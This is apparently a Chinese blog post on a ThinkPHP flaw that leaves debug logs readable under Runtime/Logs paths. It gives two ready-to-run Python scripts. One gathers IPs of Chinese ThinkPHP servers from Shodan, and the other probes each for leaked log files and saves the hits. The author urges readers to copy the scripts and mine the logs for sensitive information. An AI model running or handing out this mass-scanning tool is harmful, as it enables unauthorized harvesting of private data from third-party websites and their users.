昨天遇到了一个ThinkPHP日志泄露,然后我就写了个脚本利用shodan搜索批量的来找一下漏洞,估计已经被人撸完了,不过还有一些网站有着此漏洞。ip收集和漏洞验证脚本工具我会放在最下面,需要的直接复制运行就行。

漏洞信息:

1、ThinkPHP在开启DEBUG的情况下会在Runtime目录下生成日志,而且debug很多网站都没有关
2、ThinkPHP默认安装后,也会在Runtime目录下生成日志

THINKPHP3.2 结构:Application\Runtime\Logs\Home\16_09_09.log
THINKPHP3.1结构:Runtime\Logs\Home\16_09_09.log
日志存储结构是 :项目名\Runtime\Logs\Home\年份_月份_日期.log

例如,某个大学的日志泄露 ,里面可能存在着敏感信息,这就需要我们自己寻找和利用

ip收集脚本编写:

  1. import shodan
  2. api = shodan.Shodan('api')  # 写你自己shodan的api
  3. def Findip():
  4.     print('收集ip开始')
  5.     try:
  6.         f = open(r'ThinkPHP.txt', 'a+')
  7.         results = api.search("thinkphp country:'CN'") #如果修改搜索的内容请注意符号
  8.         print("一共找到:%s" % results['total'])
  9.         for result in results['matches']:
  10.             url = result['ip_str'] + ":" + str(result['port'])
  11.             print(url)
  12.             f.write("http://" + url)
  13.             f.write("\n")
  14.         f.close()
  15.         print('ip收集完毕')
  16.     except shodan.APIError as e:
  17.         print("end:%s" % e)
  18. Findip()

漏洞验证:将ThinkPHP.txt 和此py放同一目录

  1. import time
  2. import requests
  3.  
  4. def run():
  5.     payload_o = '/App/Runtime/Logs/22_03_29.log'
  6.     payload_t = '/Runtime/Logs/Home/22_03_29.log'
  7.     print("最后的结果保存在vlun.txt")
  8.     for ip in open('ThinkPHP.txt'):
  9.         # 把换行利用正则换成空格
  10.         ip = ip.replace('\n', '')
  11.         ip1 = ip + payload_o
  12.         ip2 = ip + payload_t
  13.         print("当前ip",ip)
  14.     # 容错处理
  15.         try:
  16.             vlun_o = requests.get(ip1).status_code
  17.             vlun_t = requests.get(ip2).status_code
  18.             if vlun_o == 200:
  19.                 print('find it->' + ip1 + '状态码为:' + str(vlun_o))
  20.                 with open(r'T1.txt', 'a+', encoding='utf-8') as f:
  21.                     f.write(ip1 + '\n')
  22.                     f.close()
  23.             if vlun_t == 200:
  24.                 print('find it->' + ip2 + '状态码为:' + str(vlun_t))
  25.                 with open(r'T1.txt', 'a+', encoding='utf-8') as f:
  26.                     f.write(ip2 + '\n')
  27.                     f.close()
  28.                     time.sleep(0.5)
  29.         except Exception as e:
  30.             pass
  31. run()

存在200即有可能存在日志泄露

不懂shodan编程的可以看 撒旦API使用指南

ThinkPHP信息泄露的更多相关文章

  1. WordPress Backdoor未授权访问漏洞和信息泄露漏洞

    漏洞名称: WordPress Backdoor未授权访问漏洞和信息泄露漏洞 CNNVD编号: CNNVD-201312-497 发布时间: 2013-12-27 更新时间: 2013-12-27 危 ...

  2. Linux kernel 内存泄露本地信息泄露漏洞

    漏洞名称: Linux kernel 内存泄露本地信息泄露漏洞 CNNVD编号: CNNVD-201311-467 发布时间: 2013-12-06 更新时间: 2013-12-06 危害等级:    ...

  3. Linux Kernel ‘/net/socket.c’本地信息泄露漏洞

    漏洞名称: Linux Kernel ‘/net/socket.c’本地信息泄露漏洞 CNNVD编号: CNNVD-201312-037 发布时间: 2013-12-04 更新时间: 2013-12- ...

  4. Linux Kernel ‘mp_get_count()’函数本地信息泄露漏洞

    漏洞名称: Linux Kernel ‘mp_get_count()’函数本地信息泄露漏洞 CNNVD编号: CNNVD-201311-054 发布时间: 2013-11-06 更新时间: 2013- ...

  5. Linux Kernel ‘/bcm/Bcmchar.c’本地信息泄露漏洞

    漏洞名称: Linux Kernel ‘/bcm/Bcmchar.c’本地信息泄露漏洞 CNNVD编号: CNNVD-201311-053 发布时间: 2013-11-06 更新时间: 2013-11 ...

  6. 【转】Android应用开发allowBackup敏感信息泄露的一点反思

    转载:http://blog.csdn.net/yanbober/article/details/46417531 1 背景 其实这篇文章可能有些小题大作,但回过头想想还是很有必要的,有点阴沟里翻船的 ...

  7. PuTTY 信息泄露漏洞

    漏洞名称: PuTTY 信息泄露漏洞 CNNVD编号: CNNVD-201308-380 发布时间: 2013-08-27 更新时间: 2013-08-27 危害等级: 低危   漏洞类型: 信息泄露 ...

  8. Linux kernel ‘key_notify_policy_flush’函数信息泄露漏洞

    漏洞名称: Linux kernel ‘key_notify_policy_flush’函数信息泄露漏洞 CNNVD编号: CNNVD-201307-072 发布时间: 2013-07-05 更新时间 ...

  9. Linux kernel ‘net/key/af_key.c’信息泄露漏洞

    漏洞名称: Linux kernel ‘net/key/af_key.c’信息泄露漏洞 CNNVD编号: CNNVD-201307-071 发布时间: 2013-07-05 更新时间: 2013-07 ...

随机推荐

  1. vue单文件组件data选项的函数体获取vue实例对象

    因配置的关系,导致 vue的data选项中存在事件.而事件无法获取 vue 的实例对象:项目是单文件形式的,以下代码只是例子 new Vue({ el:..., data:{ a: { onevent ...

  2. 说说do...while和while的区别

    一.do-while语句 do-while语句的语法: do{ statement }while(expression); 看下面示例: var i=10: do{ i+=2: }while(i< ...

  3. 遇到的错误之“Cannot find module 'XXX’的错误”

    一.问题: 在进行webpack打包的时候,会出现Cannot find module 'XXX'的错误,找不到某个模块的错误 二.解决方法: (1)方法1: 直接进行npm install重新打包: ...

  4. apollo规划控制视频-13 motion planning with autonomous driving

  5. Anaconda 怎么安装cv2

    Anaconda run python程序的时候,如果有import cv2, 但是遇到报错的时候, 可以考虑在anaconda 中安装opencv, 安装过程非常简单. 什么是opencv , op ...

  6. 2022首场MASA技术团队黑客松赛事大赛完美落幕!精彩集锦

    Masa技术团队在2021年创立,这一年我们团队发布了我们第一个产品,Masa Blazor.登上了.NET Conf China,我们承诺,开源我们的产品,为开源社区增砖加瓦,一路上收获技术社区文章 ...

  7. 一个未知宽高的元素在div中垂直水平居中

    <body> <div id="#div1"> <img src="img1.png"></img> </ ...

  8. WordPress 网站开发“微信小程序“实战(三)

    本文是"WordPress 开发微信小程序"系列的第三篇,本文记录的是开发"DeveWork+"小程序1.2 版本的过程.建议先看完第一篇.第二篇再来阅读本文. ...

  9. Spring Security的使用

    spring security使用目的:验证,授权,攻击防护. 原理:创建大量的filter和interceptor来进行请求的验证和拦截,以此来达到安全的效果. Spring Security主要包 ...

  10. java中字符串池,String池,共享池到底是怎么回事?

    栈中有共享池的概念,比 如下面例子中,sz="hello";在栈中创建一个String对象引用变量sz,然后看看栈中有没有"hello",如果没有,则将&quo ...